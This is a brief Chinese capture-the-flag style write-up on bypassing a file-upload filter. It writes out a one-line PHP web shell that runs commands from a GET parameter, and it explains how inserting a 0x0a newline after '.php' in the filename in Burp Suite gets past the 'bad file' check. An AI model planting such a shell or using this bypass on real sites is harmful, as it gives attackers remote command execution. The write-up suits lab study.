Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
极客BIM工作室33 分钟前
LSTM门控机制:本质是神经元构成的小型网络意疏1 小时前
Kali远程桌面+cpolar:网络安全攻防的跨域协作新范式Joe_Blue_022 小时前
中保研汽车小偏置碰撞案例分析qq_278984133 小时前
ubuntu vlan网络设置麦烤楽鸡翅4 小时前
give_you_flag(攻防世界)Splashtop高性能远程控制软件4 小时前
行业观察 | 微软修复63个漏洞,包含零日与CVSS 9.8关键漏洞J***Q2925 小时前
后端服务网格安全,mTLS加密通信那我掉的头发算什么6 小时前
【javaEE】多线程——线程安全进阶☆☆☆chipsense7 小时前
隔离式电流采样方案:HK4V H00,高绝缘耐压,保障强电环境采样安全